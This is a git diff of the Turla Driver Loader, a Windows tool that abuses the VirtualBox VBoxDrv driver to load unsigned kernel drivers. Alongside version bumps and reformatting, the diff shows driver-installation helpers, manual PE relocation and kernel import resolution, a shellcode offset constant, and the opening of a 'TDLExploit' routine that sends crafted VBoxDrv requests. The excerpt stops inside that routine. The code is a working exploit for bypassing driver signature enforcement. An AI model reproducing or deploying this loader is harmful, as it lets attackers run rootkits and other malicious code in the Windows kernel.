diff --git a/.gitattributes b/.gitattributes deleted file mode 100644 index bdb0cab..0000000 --- a/.gitattributes +++ /dev/null @@ -1,17 +0,0 @@ -# Auto detect text files and perform LF normalization -* text=auto - -# Custom for Visual Studio -*.cs diff=csharp - -# Standard to msysgit -*.doc diff=astextplain -*.DOC diff=astextplain -*.docx diff=astextplain -*.DOCX diff=astextplain -*.dot diff=astextplain -*.DOT diff=astextplain -*.pdf diff=astextplain -*.PDF diff=astextplain -*.rtf diff=astextplain -*.RTF diff=astextplain diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe index 0c6dfa3..348832e 100644 Binary files a/Compiled/Furutaka.exe and b/Compiled/Furutaka.exe differ diff --git a/README.md b/README.md index db1b469..06cf92b 100644 --- a/README.md +++ b/README.md @@ -32,7 +32,7 @@ In order to build from source you need Microsoft Visual Studio 2015 U1 and later # Authors -(c) 2016 TDL Project +(c) 2016 - 2017 TDL Project # Credits diff --git a/Source/Furutaka/Furutaka.sln b/Source/Furutaka/Furutaka.sln index ff6fb44..759d1e2 100644 --- a/Source/Furutaka/Furutaka.sln +++ b/Source/Furutaka/Furutaka.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 -VisualStudioVersion = 14.0.24720.0 +VisualStudioVersion = 14.0.25420.1 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Furutaka", "Furutaka.vcxproj", "{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}" EndProject diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj index 8a78707..ce94cc4 100644 --- a/Source/Furutaka/Furutaka.vcxproj +++ b/Source/Furutaka/Furutaka.vcxproj @@ -1,14 +1,6 @@  - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -26,19 +18,6 @@ Furutaka - - Application - true - v140 - Unicode - - - Application - false - v140 - true - Unicode - Application true @@ -57,12 +36,6 @@ - - - - - - @@ -70,20 +43,10 @@ - - true - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - - false - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ AllRules.ruleset @@ -93,23 +56,6 @@ NativeRecommendedRules.ruleset false - - - - - Level4 - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC - - - Console - true - TDLMain - RequireAdministrator - - @@ -124,30 +70,7 @@ Console true TDLMain - RequireAdministrator - - - - - Level4 - - - MaxSpeed - true - true - WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC - true - - - Console - true - true - true - TDLMain - true - RequireAdministrator + AsInvoker @@ -164,6 +87,8 @@ true true false + Guard + MultiThreaded Console diff --git a/Source/Furutaka/Furutaka.vcxproj.user b/Source/Furutaka/Furutaka.vcxproj.user index 8f42863..b67d65e 100644 --- a/Source/Furutaka/Furutaka.vcxproj.user +++ b/Source/Furutaka/Furutaka.vcxproj.user @@ -4,14 +4,6 @@ C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys WindowsLocalDebugger - - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys - WindowsLocalDebugger - - - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys - WindowsLocalDebugger - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys WindowsLocalDebugger diff --git a/Source/Furutaka/cui.c b/Source/Furutaka/cui.c index 39f6777..49d9770 100644 --- a/Source/Furutaka/cui.c +++ b/Source/Furutaka/cui.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: CUI.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 18 Jan 2016 +* DATE: 20 Mar 2017 * * Console output. * @@ -19,46 +19,95 @@ #include "global.h" /* -* cuiPrintText +* cuiPrintTextA * * Purpose: * * Output text to the console or file. * +* ANSI variant +* */ -VOID cuiPrintText( - _In_ HANDLE hOutConsole, - _In_ LPWSTR lpText, - _In_ BOOL ConsoleOutputEnabled, - _In_ BOOL UseReturn - ) +VOID cuiPrintTextA( + _In_ HANDLE hOutConsole, + _In_ LPSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +) { - SIZE_T consoleIO; - DWORD bytesIO; - LPWSTR Buffer; + SIZE_T consoleIO; + DWORD bytesIO; + LPSTR Buffer; - if (lpText == NULL) - return; + if (lpText == NULL) + return; - consoleIO = _strlen(lpText); - if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) - return; + consoleIO = _strlen_a(lpText); + if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) + return; - consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL); - Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO); - if (Buffer) { + consoleIO = (5 + consoleIO); + Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); + if (Buffer) { - _strcpy(Buffer, lpText); - if (UseReturn) _strcat(Buffer, TEXT("\r\n")); + _strcpy_a(Buffer, lpText); + if (UseReturn) _strcat_a(Buffer, "\r\n"); - consoleIO = _strlen(Buffer); + consoleIO = _strlen_a(Buffer); - if (ConsoleOutputEnabled == TRUE) { - WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - else { - WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); - } - RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer); - } + if (ConsoleOutputEnabled != FALSE) { + WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); + } + else { + WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL); + } + HeapFree(GetProcessHeap(), 0, Buffer); + } +} + +/* +* cuiPrintTextW +* +* Purpose: +* +* Output text to the console or file. +* +* UNICODE variant +* +*/ +VOID cuiPrintTextW( + _In_ HANDLE hOutConsole, + _In_ LPWSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +) +{ + SIZE_T consoleIO; + DWORD bytesIO; + LPWSTR Buffer; + + if (lpText == NULL) + return; + + consoleIO = _strlen(lpText); + if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) + return; + + consoleIO = (5 + consoleIO) * sizeof(WCHAR); + Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); + if (Buffer) { + + _strcpy(Buffer, lpText); + if (UseReturn) _strcat(Buffer, TEXT("\r\n")); + + consoleIO = _strlen(Buffer); + + if (ConsoleOutputEnabled != FALSE) { + WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); + } + else { + WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); + } + HeapFree(GetProcessHeap(), 0, Buffer); + } } diff --git a/Source/Furutaka/cui.h b/Source/Furutaka/cui.h index a2ded5f..3412d3a 100644 --- a/Source/Furutaka/cui.h +++ b/Source/Furutaka/cui.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: CUI.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 18 Jan 2016 +* DATE: 04 Feb 2017 * * Common header file for console ui. * @@ -18,11 +18,22 @@ *******************************************************************************/ #pragma once -#include "global.h" +VOID cuiPrintTextA( + _In_ HANDLE hOutConsole, + _In_ LPSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +); -VOID cuiPrintText( - _In_ HANDLE hOutConsole, - _In_ LPWSTR lpText, - _In_ BOOL ConsoleOutputEnabled, - _In_ BOOL UseReturn - ); +VOID cuiPrintTextW( + _In_ HANDLE hOutConsole, + _In_ LPWSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +); + +#ifdef UNICODE +#define cuiPrintText cuiPrintTextW +#else +#define cuiPrintText cuiPrintTextA +#endif diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h index c6cf4d0..b15eb0d 100644 --- a/Source/Furutaka/global.h +++ b/Source/Furutaka/global.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: GLOBAL.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * Common header file for the program support routines. * diff --git a/Source/Furutaka/instdrv.c b/Source/Furutaka/instdrv.c index 5d53482..16c29bb 100644 --- a/Source/Furutaka/instdrv.c +++ b/Source/Furutaka/instdrv.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon +* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon * * TITLE: INSTDRV.C * -* VERSION: 1.11 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -25,33 +25,33 @@ * */ BOOL scmInstallDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe +) { - SC_HANDLE schService; + SC_HANDLE schService; - schService = CreateService(SchSCManager, // SCManager database - DriverName, // name of service - DriverName, // name to display - SERVICE_ALL_ACCESS, // desired access - SERVICE_KERNEL_DRIVER, // service type - SERVICE_DEMAND_START, // start type - SERVICE_ERROR_NORMAL, // error control type - ServiceExe, // service's binary - NULL, // no load ordering group - NULL, // no tag identifier - NULL, // no dependencies - NULL, // LocalSystem account - NULL // no password - ); - if (schService == NULL) { - return FALSE; - } + schService = CreateService(SchSCManager, // SCManager database + DriverName, // name of service + DriverName, // name to display + SERVICE_ALL_ACCESS, // desired access + SERVICE_KERNEL_DRIVER, // service type + SERVICE_DEMAND_START, // start type + SERVICE_ERROR_NORMAL, // error control type + ServiceExe, // service's binary + NULL, // no load ordering group + NULL, // no tag identifier + NULL, // no dependencies + NULL, // LocalSystem account + NULL // no password + ); + if (schService == NULL) { + return FALSE; + } - CloseServiceHandle(schService); - return TRUE; + CloseServiceHandle(schService); + return TRUE; } /* @@ -63,26 +63,26 @@ BOOL scmInstallDriver( * */ BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - SC_HANDLE schService; - BOOL ret; + SC_HANDLE schService; + BOOL ret; - schService = OpenService(SchSCManager, - DriverName, - SERVICE_ALL_ACCESS - ); - if (schService == NULL) - return FALSE; + schService = OpenService(SchSCManager, + DriverName, + SERVICE_ALL_ACCESS + ); + if (schService == NULL) + return FALSE; - ret = StartService(schService, 0, NULL) - || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; + ret = StartService(schService, 0, NULL) + || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; - CloseServiceHandle(schService); + CloseServiceHandle(schService); - return ret; + return ret; } /* @@ -94,35 +94,35 @@ BOOL scmStartDriver( * */ BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice - ) + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice +) { - TCHAR completeDeviceName[64]; - HANDLE hDevice; + TCHAR completeDeviceName[64]; + HANDLE hDevice; - RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); - wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); + RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); + wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); - hDevice = CreateFile(completeDeviceName, - GENERIC_READ | GENERIC_WRITE, - 0, - NULL, - OPEN_EXISTING, - FILE_ATTRIBUTE_NORMAL, - NULL - ); - if (hDevice == INVALID_HANDLE_VALUE) - return FALSE; + hDevice = CreateFile(completeDeviceName, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, + NULL + ); + if (hDevice == INVALID_HANDLE_VALUE) + return FALSE; - if (lphDevice) { - *lphDevice = hDevice; - } - else { - CloseHandle(hDevice); - } + if (lphDevice) { + *lphDevice = hDevice; + } + else { + CloseHandle(hDevice); + } - return TRUE; + return TRUE; } /* @@ -134,39 +134,39 @@ BOOL scmOpenDevice( * */ BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - INT iRetryCount; - SC_HANDLE schService; - BOOL ret; - SERVICE_STATUS serviceStatus; + BOOL ret; + INT iRetryCount; + SC_HANDLE schService; + SERVICE_STATUS serviceStatus; - ret = FALSE; - schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); - if (schService == NULL) { - return ret; - } + ret = FALSE; + schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); + if (schService == NULL) { + return ret; + } - iRetryCount = 5; - do { - SetLastError(0); + iRetryCount = 5; + do { + SetLastError(0); - ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); - if (ret == TRUE) - break; + ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); + if (ret != FALSE) + break; - if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) - break; + if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) + break; - Sleep(1000); - iRetryCount--; - } while (iRetryCount); + Sleep(1000); + iRetryCount--; + } while (iRetryCount); - CloseServiceHandle(schService); + CloseServiceHandle(schService); - return ret; + return ret; } /* @@ -178,27 +178,19 @@ BOOL scmStopDriver( * */ BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - SC_HANDLE schService; - BOOL bResult = FALSE; + SC_HANDLE schService; + BOOL bResult = FALSE; - schService = OpenService(SchSCManager, - DriverName, - DELETE - ); - - if (schService == NULL) { - return bResult; - } - - bResult = DeleteService(schService); - - CloseServiceHandle(schService); - - return bResult; + schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); + if (schService) { + bResult = DeleteService(schService); + CloseServiceHandle(schService); + } + return bResult; } /* @@ -210,26 +202,23 @@ BOOL scmRemoveDriver( * */ BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name - ) + _In_ LPCTSTR Name +) { - SC_HANDLE schSCManager; - BOOL bResult = FALSE; + SC_HANDLE schSCManager; + BOOL bResult = FALSE; - if (Name == NULL) { - return bResult; - } + if (Name == NULL) { + return bResult; + } - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); - if (schSCManager) { - scmStopDriver(schSCManager, Name); - bResult = scmRemoveDriver(schSCManager, Name); - CloseServiceHandle(schSCManager); - } - return bResult; + schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (schSCManager) { + scmStopDriver(schSCManager, Name); + bResult = scmRemoveDriver(schSCManager, Name); + CloseServiceHandle(schSCManager); + } + return bResult; } /* @@ -241,25 +230,25 @@ BOOL scmUnloadDeviceDriver( * */ BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_ PHANDLE lphDevice - ) + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice +) { - SC_HANDLE schSCManager; - BOOL bResult = FALSE; + SC_HANDLE schSCManager; + BOOL bResult = FALSE; - if (Name == NULL) { - return bResult; - } + if (Name == NULL) { + return bResult; + } - schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (schSCManager) { - scmRemoveDriver(schSCManager, Name); - scmInstallDriver(schSCManager, Name, Path); - scmStartDriver(schSCManager, Name); - bResult = scmOpenDevice(Name, lphDevice); - CloseServiceHandle(schSCManager); - } - return bResult; + schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (schSCManager) { + scmRemoveDriver(schSCManager, Name); + scmInstallDriver(schSCManager, Name, Path); + scmStartDriver(schSCManager, Name); + bResult = scmOpenDevice(Name, lphDevice); + CloseServiceHandle(schSCManager); + } + return bResult; } diff --git a/Source/Furutaka/instdrv.h b/Source/Furutaka/instdrv.h index 91400f2..42cf1cb 100644 --- a/Source/Furutaka/instdrv.h +++ b/Source/Furutaka/instdrv.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon +* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon * * TITLE: INSTDRV.H * * VERSION: 1.10 * -* DATE: 10 Mar 2015 +* DATE: 17 Apr 2017 * * Common header file for the program SCM usage. * @@ -16,39 +16,40 @@ * PARTICULAR PURPOSE. * *******************************************************************************/ +#pragma once BOOL scmInstallDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe +); BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice - ); + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice +); BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name - ); + _In_ LPCTSTR Name +); BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_ PHANDLE lphDevice - ); + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice +); diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c index aaad15b..c0b7c24 100644 --- a/Source/Furutaka/main.c +++ b/Source/Furutaka/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 04 Feb 2016 +* DATE: 17 Apr 2017 * * Furutaka entry point. * @@ -32,7 +32,7 @@ HANDLE g_ConOut = NULL; HANDLE g_hVBox = INVALID_HANDLE_VALUE; BOOL g_ConsoleOutput = FALSE; BOOL g_VBoxInstalled = FALSE; -WCHAR BE = 0xFEFF; +WCHAR g_BE = 0xFEFF; #define VBoxDrvSvc TEXT("VBoxDrv") #define supImageName "furutaka" @@ -40,11 +40,11 @@ WCHAR BE = 0xFEFF; #define PAGE_SIZE 0x1000 #define scDataOffset 0x214 //shellcode data offset -#define T_LOADERTITLE TEXT("Turla Driver Loader v1.0 (04/02/16)") +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") -#define T_LOADERINTRO TEXT("Turla Driver Loader v1.0.0 started\r\n(c) 2016 TDL Project\r\nSupported x64 OS : 7 and above\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") /* * TDLVBoxInstalled @@ -55,23 +55,23 @@ WCHAR BE = 0xFEFF; * */ BOOL TDLVBoxInstalled( - VOID - ) + VOID +) { - BOOL bPresent = FALSE; - LRESULT lRet; - HKEY hKey = NULL; - - lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), - 0, KEY_READ, &hKey); + BOOL bPresent = FALSE; + LRESULT lRet; + HKEY hKey = NULL; - bPresent = (hKey != NULL); + lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), + 0, KEY_READ, &hKey); - if (hKey) { - RegCloseKey(hKey); - } + bPresent = (hKey != NULL); - return bPresent; + if (hKey) { + RegCloseKey(hKey); + } + + return bPresent; } /* @@ -83,51 +83,51 @@ BOOL TDLVBoxInstalled( * */ void TDLRelocImage( - ULONG_PTR Image, - ULONG_PTR NewImageBase - ) + ULONG_PTR Image, + ULONG_PTR NewImageBase +) { - PIMAGE_OPTIONAL_HEADER popth; - PIMAGE_BASE_RELOCATION rel; - DWORD_PTR delta; - LPWORD chains; - DWORD c, p, rsz; + PIMAGE_OPTIONAL_HEADER popth; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; - popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; - if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) - if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) - { - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + - popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; - delta = (DWORD_PTR)NewImageBase - popth->ImageBase; - c = 0; + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)NewImageBase - popth->ImageBase; + c = 0; - while (c < rsz) { - p = sizeof(IMAGE_BASE_RELOCATION); - chains = (LPWORD)((PBYTE)rel + p); + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); - while (p < rel->SizeOfBlock) { + while (p < rel->SizeOfBlock) { - switch (*chains >> 12) { - case IMAGE_REL_BASED_HIGHLOW: - *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; - break; - case IMAGE_REL_BASED_DIR64: - *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; - break; - } + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } - chains++; - p += sizeof(WORD); - } + chains++; + p += sizeof(WORD); + } - c += rel->SizeOfBlock; - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); - } - } + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } } /* @@ -139,19 +139,19 @@ void TDLRelocImage( * */ ULONG_PTR TDLGetProcAddress( - ULONG_PTR KernelBase, - ULONG_PTR KernelImage, - LPCSTR FunctionName - ) + ULONG_PTR KernelBase, + ULONG_PTR KernelImage, + LPCSTR FunctionName +) { - ANSI_STRING cStr; - ULONG_PTR pfn = 0; + ANSI_STRING cStr; + ULONG_PTR pfn = 0; - RtlInitString(&cStr, FunctionName); - if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) - return 0; + RtlInitString(&cStr, FunctionName); + if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) + return 0; - return KernelBase + (pfn - KernelImage); + return KernelBase + (pfn - KernelImage); } /* @@ -163,43 +163,43 @@ ULONG_PTR TDLGetProcAddress( * */ void TDLResolveKernelImport( - ULONG_PTR Image, - ULONG_PTR KernelImage, - ULONG_PTR KernelBase - ) + ULONG_PTR Image, + ULONG_PTR KernelImage, + ULONG_PTR KernelBase +) { - PIMAGE_OPTIONAL_HEADER popth; - ULONG_PTR ITableVA, *nextthunk; - PIMAGE_IMPORT_DESCRIPTOR ITable; - PIMAGE_THUNK_DATA pthunk; - PIMAGE_IMPORT_BY_NAME pname; - ULONG i; + PIMAGE_OPTIONAL_HEADER popth; + ULONG_PTR ITableVA, *nextthunk; + PIMAGE_IMPORT_DESCRIPTOR ITable; + PIMAGE_THUNK_DATA pthunk; + PIMAGE_IMPORT_BY_NAME pname; + ULONG i; - popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; - if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) - return; + if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) + return; - ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; - if (ITableVA == 0) - return; + ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (ITableVA == 0) + return; - ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); + ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); - if (ITable->OriginalFirstThunk == 0) - pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); - else - pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); + if (ITable->OriginalFirstThunk == 0) + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); + else + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); - for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { - nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); - if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { - pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); - nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); - } - else - nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); - } + for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { + nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); + if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { + pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); + } + else + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); + } } /* @@ -211,160 +211,160 @@ void TDLResolveKernelImport( * */ void TDLExploit( - LPVOID Shellcode, - ULONG CodeSize - ) + LPVOID Shellcode, + ULONG CodeSize +) { - SUPCOOKIE Cookie; - SUPLDROPEN OpenLdr; - DWORD bytesIO = 0; - RTR0PTR ImageBase = NULL; - ULONG_PTR paramOut; - PSUPLDRLOAD pLoadTask = NULL; - SUPSETVMFORFAST vmFast; - SUPLDRFREE ldrFree; - SIZE_T memIO; - WCHAR text[256]; + SUPCOOKIE Cookie; + SUPLDROPEN OpenLdr; + DWORD bytesIO = 0; + RTR0PTR ImageBase = NULL; + ULONG_PTR paramOut; + PSUPLDRLOAD pLoadTask = NULL; + SUPSETVMFORFAST vmFast; + SUPLDRFREE ldrFree; + SIZE_T memIO; + WCHAR text[256]; - while (g_hVBox != INVALID_HANDLE_VALUE) { - RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); - Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; - Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; - Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; - Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - Cookie.Hdr.rc = 0; - 